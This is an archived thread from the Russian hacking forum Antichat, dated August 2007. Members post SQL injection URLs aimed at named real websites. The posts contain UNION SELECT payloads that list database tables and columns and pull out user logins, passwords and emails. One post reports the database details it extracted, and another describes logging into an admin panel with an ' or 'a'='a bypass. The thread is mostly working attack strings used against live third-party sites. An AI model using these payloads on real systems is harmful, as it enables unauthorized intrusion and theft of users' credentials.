ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
12.08.2007, 11:13
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286
Репутация:
187
|
|
Код:
http://www.phfokc.com/show_press.php?id=430000%20union%20select%201,2,TABLE_NAME,4%20FROM+INFORMATION_SCHEMA.TABLES%20limit%200,1/*
Код:
http://www.phfokc.com/show_press.php?id=430000%20union%20select%201,2,column_name,4%20FROM+information_schema.columns%20limit%200,1/*
|
|
|
13.08.2007, 11:29
|
|
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900
Репутация:
138
|
|
Сообщение от Calcutta
http://top.kmvcity.ru/stat.php?id=1' < - ругается на SQL синтакс
при подборе через +order+by ничего нельзя добиться.
что можно получить с этого сайта "толкового"?
Подобрал кол-во столбцов:
Код:
http://top.kmvcity.ru/stat.php?id=1'union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
Попробуй угадать таблицы 
|
|
|
|
13.08.2007, 14:32
|
|
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753
Репутация:
552
|
|
большая бд 
Код:
http://www.comicbookresources.com/news/newsitem.cgi?id=-11511+union+select+1,2,3,4,concat_ws(0x203a20,id,name,password,email),6,7,8+from+users+limit+16000,1/*
|
|
|
|
13.08.2007, 15:32
|
|
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900
Репутация:
138
|
|
инъекция тут
Код:
http://www.dog.ru/index.php3?mode=5&id=417652+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
таблица users |
|
|
|
13.08.2007, 16:42
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286
Репутация:
187
|
|
Сообщение от phol1eadeux
инъекция тут
Код:
http://www.dog.ru/index.php3?mode=5&id=417652+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
таблица users
Код:
http://www.dog.ru/index.php3?mode=5&id=417652--00+union+select+1,2,3,4,5,concat(name,char(58),passwd,char(58),email,char(58),id,char(58),version(),char(58),user(),char(58),database()),7,8,9,10,11,12,13,14%20from%20users%20limit%200,1/*
+table "search"
|
|
|
|
13.08.2007, 17:09
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
http://www.flashonthebeach.com
http://www.flashonthebeach.com/speakers/index.php?pageid=-1+UNION+SELECT+1,USER(),3,4,VERSION()/*
|
|
|
|
13.08.2007, 17:15
|
|
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900
Репутация:
138
|
|
Код:
http://fckhimki.ru/modules/players/print.php?current_id=&player_id=-1+union+select+1,2,3,4,5,6,concat(name,char(58),height,char(58),weight,char(58),country,char(58),position),8,9,10,11,12,13,14,15,16,17,18,19,20+from+players+limit+0,1/*
база: fckhimki_new1;
версия: 4.0.27-max-log;
юзер: fckhimki_new1@v2.valuehost.ru
К базам mysql и forum подобраться не получиться, зато
можно поиздеваться над таблицами news и players
Последний раз редактировалось phol1eadeux; 13.08.2007 в 17:27..
|
|
|
|
13.08.2007, 17:31
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
http://www.sat-tv.ru
http://www.sat-tv.ru/?pageId=4&subId=-1+UNION+SELECT+1,CONCAT_WS(CHAR(42),VERSION(),USER (),DATABASE()),3,4,5,6,7,8,9,0+--+
http://www.sat-tv.ru/?pageId=4&subId=-1+UNION+SELECT+1,TABLE_NAME,3,4,5,6,7,8,9,0+FROM+I NFORMATION_SCHEMA.TABLES+--+
http://www.sat-tv.ru/?pageId=4&subId=-1+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,0+FROM+ INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=CHAR(0 x55,0x73,0x65,0x72,0x73)+--+
http://www.sat-tv.ru/?pageId=4&subId=-1+UNION+SELECT+1,CONCAT_WS(CHAR(42),Login,Password ),3,4,5,6,7,8,9,0+FROM+Users+--+
Последний раз редактировалось groundhog; 13.08.2007 в 17:41..
|
|
|
|
13.08.2007, 18:16
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
чет у меня ничего не получается,мож у кого получится
код:
http://www.reviews.ru/clause/article.asp?id=2155
Вот подобрано количество полей:
http://www.reviews.ru/clause/article.asp?id=-1+UNION+SELECT+1,2,cast(3+as+nvarchar),4,cast(5+as +nvarchar),cast(6+as+nvarchar),cast(7+as+nvarchar) ,cast(8+as+nvarchar),cast(9+as+nvarchar),10,11,12, cast(13+as+nvarchar),cast(15+as+nvarchar)--
Но он на такой запросы выдаёт:
Microsoft OLE DB Provider for SQL Server error '80040e14'
The text, ntext, or image data type cannot be selected as DISTINCT.
D:\HOME\REVIEWS\HTML\CLAUSE\../inc/article/article.asp, line 23
Как это обойти я не допёр...
|
|
|
|
14.08.2007, 06:23
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838
Репутация:
770
|
|
http://gorodclub.ru/adm/forum/home.viewprofile.php?user=-1'+union+select+1,2,3,4,5,6/*
странно, но ни 1 названия не мог подобрать
зато в админку зашел стандартным ' or 'a'='a (;
Последний раз редактировалось Calcutta; 14.08.2007 в 06:26..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
